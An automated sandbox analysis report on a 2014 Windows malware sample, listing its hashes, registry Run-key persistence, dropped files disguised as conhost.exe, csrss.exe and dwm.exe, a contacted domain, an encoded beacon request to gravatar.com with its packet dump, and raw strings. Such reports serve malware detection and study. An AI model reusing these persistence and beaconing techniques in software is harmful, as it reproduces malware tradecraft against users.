Analysis Date2014-09-01 02:40:40
MD56a86113a95a49243aaee0b53f34aca0b
SHA1f8c15468d32db527119e960ecf511a7f2a984bb6

Static Details:

File typePE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section.text md5: d2cb85d6718e74364d174b100ffbe336 sha1: 63b73ce8ea2d9d98ea76180c328043e0b5809b29 size: 100352
Section.tls md5: aa74188c3c1a960d78aa99eaca5ac266 sha1: 944893e919f7ea45af7d54bae5c5cc0c6d184020 size: 1536
Section.data md5: 001025d2529887d5db0c1b531a30f420 sha1: 076f61d2d2d92a17e012c05026a22428f3c30a77 size: 67584
Section.reloc md5: c3de424b2cefa4e58d6f06d0eb34a855 sha1: e0900972403e775249bb5a48fffd3254397d3163 size: 1024
Timestamp2005-11-09 08:56:12
PEhash7ea6d32dbd9bb02d62a640c49a0a74949cdaa140
IMPhashbf1ba673400d770ca178413009bea1d8

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

RegistryHKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝
1
RegistryHKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\conhost ➝
C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates FileC:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Cookies\index.dat
Creates FilePIPE\lsarpc
Creates File\Device\Afd\Endpoint
Creates FileC:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates FileC:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates FileC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates ProcessC:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates Mutex{A5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates MutexWininetConnectionMutex
Creates Mutexc:!documents and settings!administrator!cookies!
Creates Mutex{1ACD3490-8843-47EB-867B-EDDDD7FA37FD}
Creates Mutex{61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex{0ECE180F-6E9E-4FA6-A154-6876D9DB8906}
Creates Mutexc:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex{B5B35993-9674-43cd-8AC7-5BC5013E617B}
Creates Mutex{B16C7E24-B3B8-4962-BF5E-4B33FD2DFE78}
Creates Mutex{B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutexc:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex{6988405C-71C3-427c-975A-0398706E79EE}
Winsock DNS127.0.0.1
Winsock DNShappyratatuy.com
Winsock DNSgravatar.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates ProcessC:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates ProcessC:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNSgravatar.com
Type: A
192.0.80.242
DNSgravatar.com
Type: A
192.0.80.239
DNSgravatar.com
Type: A
192.0.80.240
DNSgravatar.com
Type: A
192.0.80.241
DNShappyratatuy.com
Type: A
HTTP GEThttp://gravatar.com/avatar.php?gravatar_id=f2a3889aff6fc9711a3cbcfe64067be2?v51=33&tq=gHZutDyMv5rJeTTia9nrmsl6giWz%2BJZbVyA%3D
User-Agent: mozilla/2.0
Flows TCP192.168.1.1:1031 ➝ 192.0.80.242:80

Raw Pcap
0x00000000 (00000)   47455420 2f617661 7461722e 7068703f   GET /avatar.php?
0x00000010 (00016)   67726176 61746172 5f69643d 66326133   gravatar_id=f2a3
0x00000020 (00032)   38383961 66663666 63393731 31613363   889aff6fc9711a3c
0x00000030 (00048)   62636665 36343036 37626532 3f763531   bcfe64067be2?v51
0x00000040 (00064)   3d333326 74713d67 485a7574 44794d76   =33&tq=gHZutDyMv
0x00000050 (00080)   35724a65 54546961 396e726d 736c3667   5rJeTTia9nrmsl6g
0x00000060 (00096)   69577a25 32424a5a 62567941 25334420   iWz%2BJZbVyA%3D 
0x00000070 (00112)   48545450 2f312e30 0d0a436f 6e6e6563   HTTP/1.0..Connec
0x00000080 (00128)   74696f6e 3a20636c 6f73650d 0a486f73   tion: close..Hos
0x00000090 (00144)   743a2067 72617661 7461722e 636f6d0d   t: gravatar.com.
0x000000a0 (00160)   0a416363 6570743a 202a2f2a 0d0a5573   .Accept: */*..Us
0x000000b0 (00176)   65722d41 67656e74 3a206d6f 7a696c6c   er-Agent: mozill
0x000000c0 (00192)   612f322e 300d0a0d 0a                  a/2.0....


Strings
...
z
;
.U
a
080904b0
1.0.0.1
1594
FileVersion
&No Exit  Shift+N
PrivateBuild
ProductVersion
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
&Yes
|0h;	A
0h;\]h!Jm
0hvhs8&
0hW'%:
'1awjx`M
~>/1EIPI
{1~F 1
1FW]Jc
!	1;iY>*S
1l Nl9
1NMPh]j
:1wf8OMp
2h5[ h
2h}BhsH
2h;iia
2hKBh&
2hk"hY
,2h#ph
3KM?i`
3M8'~e
3Ph3BhN
3)wy8W
3YxM`h]+J
:45\km3
=]4Bhh
4BY3yO
[[4to^n
.5;['%
5={>An
-.5F5i
>5{`hS
6',2o,
6mo;rh
]6rhJA_
6\UMc h9
71)%u4
7AoRh}Q
7.Rich
^7ZQ h
83gtPh
8h2.dl
8@h(Bhs>
8`h^hRh
8%QPs9e4
]%92ht
9eiC	7:6>
9GLnit
9ZqfH0
a3 ht h
abh/oF
aCN$V]
a*`hU%
aiL	d4
ajX|OD=
aL)HYw
AlphaBlend
a<N"h	=
ar%4[o
AUu{Q[
az7j~";
B%6,pdH1%
bhhj#$@h
Bh"h/V
BhM4Mg
bhV`h{;
B]:LL2
BO]Hf'@
BS3uz/
c4(-SGSPh{
c9,F"h
%cDIXCN
CoCreateInstance
CoGetMalloc
CoTaskMemAlloc
CoTaskMemFree
CoTaskMemRealloc
`c(P$<7
C[PhyX
C\QfXb
CreateFontIndirectA
c}rUh/
d2h.2h
d6ft{1x
DA[2hGi
@.data
DeleteCriticalSection
DeleteObject
DgBh?U
*DGPhaD
diIJBhK
dI.Rhc
Dphc%<J
dVsbhn1:
e[2~`\
e7)f`h
E`D%hI
eE0hm'
e.F\U2
e],`h8
EI"1E*
EnterCriticalSection
EnumResourceTypesA
eop1AYxO
e!\Rh7
f0h~rh1
f3U'oM
f!9&@h
'fb88z
fem-T@hS
fF#lH	e^1
F^/KE6
Fmwt9B
}F^Ph=5
f)Q@h4"hT
FreeEnvironmentStringsA
FreeEnvironmentStringsW
gDCh.$I
GDI32.dll
?~gdPhTs
GetACP
GetCPInfo
GetCPInfoExW
GetCurrentProcessId
GetDeviceCaps
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastError
GetLocaleInfoA
GetOEMCP
GetStartupInfoA
GetStdHandle
GetTextExtentPointA
GetTextMetricsA
GetThreadLocale
GetTickCount
GetVersionExA
<](gg#
G>`h@h
gij]@h
g	jW#v9
}Gz0hg
`h)?,(
H0h.0h
h0hIph
h))0hWf
h^2h:8
h2hF6x
h%3@h.
h&4)3F
	|$"h5
h6rh2h
h7tu8w.:5
h?	-%9AG
 ha0hl"h
hA43-z
Haab&s
hbh[QW
hbhw]^.X
h<Bv4`
h/]CUDo
hD0hvqm
hdbh h
h%/D/I
he0h\c
"h$eaJ/
HeapSize
h{;e{u
hfHlV\ h
hFx8djH{
hGHsz5
"h%@h%
h	`h(/
h h/5|d
hh5{ph
h"h7cZm
h@h/aY
h`hEFI
hhGDI3
h hhTv
h>`h.N
h hph[
,"h hT
h?J5?o3
hJ h:^%
hJ`h5[7
hJrhGc;
hl+ hY
HlM=QfbhV
hlX`haj
h(~'lz~?
hNRhuV
H}N+]Y<
HO6JLM/u
@hOphe
ho/x[l
h<ph3rh
hPhBh%
hPhh9{Z
hPh{lo
hPho(}
hphphL
hPh,uX
hQC7`h<Rh
hqRhuVRh
hRh?+#
@hrh2h
hRhc-ZU
hrheph
ht<H5@h
hTMwv}+
htq"h^.F
h=U*7D%
`huCrh
hu%s.4
h%uv h
hU|xx^*
hvEGRh"h
h!(vq"h
=`hw$9
h!W%A*-
hxOFI!
h(z>Y"h
i%$H&3
InitializeCriticalSection
InterlockedExchange
InterlockedIncrement
i	\Ogx
is_b y
=\I:#U
iZ#ph4
J0hrh9
j2h h~
J6s-6,
JgsyCs:
j}i6S`D
KERNEL32.dll
K h,.0h
(K@h0hBh
KHJ=#9
?k[LPh
KR2M}tI\
%%.kr4
KuLf=1
ku%WN/
k/.y0h
LeaveCriticalSection
LG]Iyd
L^ hbh
$liV0h
LkieLQ
LoadLibraryW
L@*qt.
lstrlenW
LvbhF=+;
m^54W.^(7
M8"X[-'9ST
mJp'.>
MKph/G]
M_K/^w h
MSIMG32.dll
MultiByteToWideChar
mVmx;M
m:%W;8w&
mZlOpIz
n0hJdjU
+n% 5O[
#(nh1LC8
nhnPh5
nk3a{0hj
n=RhZz
NS-:+5
NvvzE`=
Nxn^>[<)5x
	nXqg"h
o26i-`
Odb,nFm#d&
of=ZT!f
ole32.dll
OL<I}Q
oLue7a:
oph^	rh^
OpOT;k
Ph0h"h
.~:Ph4
Ph+G5}
>ph@hnPh
Ph<>#hUDH@h
Phn0h+E
PhRh]u#,Wt
phs<8`h}
p+l/h`{
puMmv(
Qf h1vi1
QhAzRh
q"h@hbh
Q|H?qL
qRhj~S(a
QtDkFSK
QueryPerformanceCounter
 qv9_0%_
r0Hge'R
R4f{4YN
RaiseException
`RbBwpHP
.reloc
RhbhIQ
RhBhU hg
rh-_F:
rh,gPh
rh"h"h
RhLh;^2hrh
Rhn{,e
Rh>OPh{
Rh$)Q~^
{RhQt"h
^rhsq!
Rh,-:x
rUrf>@
) s=`%
/-s?06
s0hm3X
:S1%Eg
&|S<2h
S4x:Fe
SelectObject
SetHandleCount
S`h h]d
`Si#a.
SLFY:hy~
StringFromGUID2
~T?=2h
TA1wLM
}T/%As1
t$f?0h
T&g<T=
!This program cannot be run in DOS mode.
Ths[+Z
TlsGetValue
TlsSetValue
T@MG	>#:aT
TransparentBlt
T~SSdx0
TTzo=>
TVU&+%nN
]u1~8;
-\#U9!
uF&`h:
UnhandledExceptionFilter
u*Q-Ad:jk9U
<uS2h:Z
uU*s ,a
`uX{$9
_UXk$g
@v.2"#
V2h"hx
V[_cTaM
V}|IdR
VjtG\o
v+/Lx"
v%'nQU
vPh	9u*F
VS&'AT
vtuph3
VWk%lL,
\$V	XAG
vX#k<N?$m
;V&zRhS
w?_BSK
WeU%y]$
)	?W"h
W> h5h
WideCharToMultiByte
Wl9*)j
wL{*`'l_
WriteFile
Wsr7'S
Wx7&\phJ
x5h*@h
X9!95y
Xa\+|E
xf92m(
+_xi`Bh
x@ijS&
*XkZ]n@h
x-|\(nD
XRheZKmo
x%ru7ro
XSZE!~
*XxIAwf
Y]:0hPh
Y888EE"h:A:
<~&y@D
y-}{eC
YG4Zw:G
yG hW6l
(y{Hi"-
yn[y`h
Z2hUGM
z2hv0h8"h
Z3ay<$xC
Z6TCQB
Z9V_rh=~S
*ZP	#F
z,PhPhQ
ztK>{'